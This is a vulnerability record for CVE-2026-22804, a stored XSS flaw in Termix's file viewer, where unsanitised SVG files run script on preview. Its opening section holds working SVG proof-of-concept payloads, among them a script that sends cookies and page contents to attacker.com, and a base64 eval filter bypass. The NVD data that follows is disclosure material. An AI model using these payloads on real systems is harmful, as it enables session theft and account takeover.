CVE-2026-22804

<!-- 恶意SVG文件示例 - 存储型XSS PoC --> <svg xmlns="http://www.w3.org/2000/svg"> <script>alert(document.cookie)</script> <rect width="100" height="100" fill="red"/> </svg> <!-- 更复杂的XSS payload --> <svg xmlns="http://www.w3.org/2000/svg"> <script> // 窃取用户会话信息 fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie)) // 获取页面内容 fetch('https://attacker.com/steal?data=' + encodeURIComponent(document.body.innerHTML)) </script> </svg> <!-- 绕过过滤的SVG payload --> <svg xmlns="http://www.w3.org/2000/svg" onload="eval(atob('YWxlcnQoJ1hTUyBFeHBsb2l0ZWQnKQ=='))"> </svg>

{"cve": {"id": "CVE-2026-22804", "sourceIdentifier": "[email protected]", "published": "2026-01-12T23:15:53.063", "lastModified": "2026-01-16T18:37:32.920", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. From 1.7.0 to 1.9.0, Stored Cross-Site Scripting (XSS) vulnerability exists in the Termix File Manager component. The application fails to sanitize SVG file content before rendering it. This allows an attacker who has compromised a managed SSH server to plant a malicious file, which, when previewed by the Termix user, executes arbitrary JavaScript in the context of the application. The vulnerability is located in src/ui/desktop/apps/file-manager/components/FileViewer.tsx. This vulnerability is fixed in 1.10.0."}, {"lang": "es", "value": "Termix es una plataforma de gestión de servidores basada en web con capacidades de terminal SSH, tunelización y edición de archivos. Desde la versión 1.7.0 hasta la 1.9.0, existe una vulnerabilidad de cross-site scripting (XSS) almacenado en el componente Termix File Manager. La aplicación no logra sanear el contenido de archivos SVG antes de renderizarlo. Esto permite a un atacante que ha comprometido un servidor SSH gestionado plantar un archivo malicioso, el cual, al ser previsualizado por el usuario de Termix, ejecuta JavaScript arbitrario en el contexto de la aplicación. La vulnerabilidad se encuentra en src/ui/desktop/apps/file-manager/components/FileViewer.tsx. Esta vulnerabilidad se corrigió en la versión 1.10.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-269"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:termix:termix:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.7.0", "versionEndExcluding": "1.10.0", "matchCriteriaId": "912FDA87-25B4-4E18-B7E9-FC8AA0FCF398"}]}]}], "references": [{"url": "https://github.com/Termix-SSH/Termix/security/advisories/GHSA-m3cv-5hgp-hv35", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/Termix-SSH/Termix/security/advisories/GHSA-m3cv-5hgp-hv35", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}